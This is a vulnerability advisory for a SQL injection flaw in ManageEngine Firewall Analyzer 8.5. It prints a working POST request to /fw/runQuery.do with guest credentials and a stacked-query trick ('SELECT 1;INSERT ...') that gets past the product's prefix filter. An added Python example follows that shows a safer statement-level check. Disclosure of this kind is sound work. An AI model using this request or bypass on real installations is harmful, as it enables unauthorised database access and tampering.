
ManageEngine Firewall Analyzer 8.5 SQL Injection

22 Feb 2016, reported by Sachin Wagh. Type: packetstorm. Source: packetstormsecurity.com

`================================================================  
ManageEngine Firewall Analyzer 8.5 SQL Query Execution Vulnerability  
================================================================  
  
Description :  
  
Vulnerability Type : ManageEngine Firewall Analyzer 8.5 SQL Query Execution  
Vulnerability  
Vulnerable Version : 8.5  
Vendor Homepage: https://www.manageengine.com/products/firewall/download.html  
CVE-ID :  
Severity : High  
Author – Sachin Wagh (@tiger_tigerboy)  
  
ManageEngine Firewall Analyzer is agentless log analytics and  
configuration management software that helps network administrators  
centrally collect, archive, and analyze their security device logs and  
generate forensic reports from them.  
  
The vulnerability exists due to an error in the RunQuery command. An  
authenticated, remote attacker could exploit this vulnerability via a  
crafted POST request. An exploit could allow the attacker to execute  
arbitrary SQL queries on the underlying database server.  
  
Every user has the ability to execute SQL queries through the  
"/fw/runQuery.do" script, including the default "guest" user.  
  
Below is the POST request, executed as "guest":  
  
POST /fw/runQuery.do HTTP/1.1  
Host: localhost:8500  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost:8500/fw/runQuery.do  
Cookie: username=guest; password=8094789293; leftPanel=230px; JSESSIONID=3590F06EA06BBA9B0FC9A40405E1144F; JSESSIONIDSSO=96016151FC34CD1EA17192C6AF288A14; FWA_TABLE=TS  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 123  
  
execute=true&DatabaseType=postgres&query=select version()  
  
Queries starting with "INSERT" or "UPDATE" are rejected with the warning  
"operation not permitted".  
  
But when a query such as "SELECT 1;INSERT INTO ..." is executed, no  
warning is given.  
  
Affected Product:  
-----------------------------------------------------------------------------------------------------------------------  
  
Vulnerable Product:  
[+] ManageEngine Firewall Analyzer 8.5  
  
Credits & Authors  
------------------------------------------------------------------------------------------------------------------------  
Sachin Wagh (@tiger_tigerboy)  
  
Thanks.  
`
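
The filter behaviour the advisory describes (a warning for queries starting with "INSERT" or "UPDATE", none for "SELECT 1;INSERT INTO ...") is shown here as an added Python example, not code from the advisory or from ManageEngine: a prefix-only check beside a statement-aware one. The function names, the extra write verbs and the table name `audit_demo` are assumptions made for illustration.

```python
import re

# INSERT and UPDATE are the verbs named in the advisory; the rest are assumed.
WRITE_VERBS = {"INSERT", "UPDATE", "DELETE", "DROP", "ALTER", "CREATE", "TRUNCATE"}

def first_keyword(sql):
    """Return the leading SQL keyword in upper case, or '' if there is none."""
    m = re.match(r"\s*([A-Za-z]+)", sql)
    return m.group(1).upper() if m else ""

def prefix_check(query):
    """Weak check: only the start of the submitted string is inspected."""
    return first_keyword(query) not in WRITE_VERBS

def split_statements(query):
    """Split on ';' outside '...' literals and "..." identifiers.
    Simplified: comments, dollar quoting and E'' escapes are not handled."""
    statements, buf, quote = [], [], None
    for ch in query:
        if quote:
            if ch == quote:
                quote = None
        elif ch in ("'", '"'):
            quote = ch
        elif ch == ";":
            statements.append("".join(buf))
            buf = []
            continue
        buf.append(ch)
    statements.append("".join(buf))
    return [s.strip() for s in statements if s.strip()]

def statement_check(query):
    """Allow exactly one statement, and only if it is a SELECT."""
    stmts = split_statements(query)
    return len(stmts) == 1 and first_keyword(stmts[0]) == "SELECT"

# Constructed sample queries; audit_demo is a hypothetical table name.
SAMPLES = [
    "select version()",
    "INSERT INTO audit_demo VALUES (1)",
    "SELECT 1;INSERT INTO audit_demo VALUES (1)",
    "SELECT ';' AS sep",
]

if __name__ == "__main__":
    for q in SAMPLES:
        print(f"{q!r:50} prefix={prefix_check(q)} statement={statement_check(q)}")
```

The third sample passes `prefix_check` and fails `statement_check`. A string-level check of this kind complements, and does not replace, running the endpoint's queries under a read-only database role.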
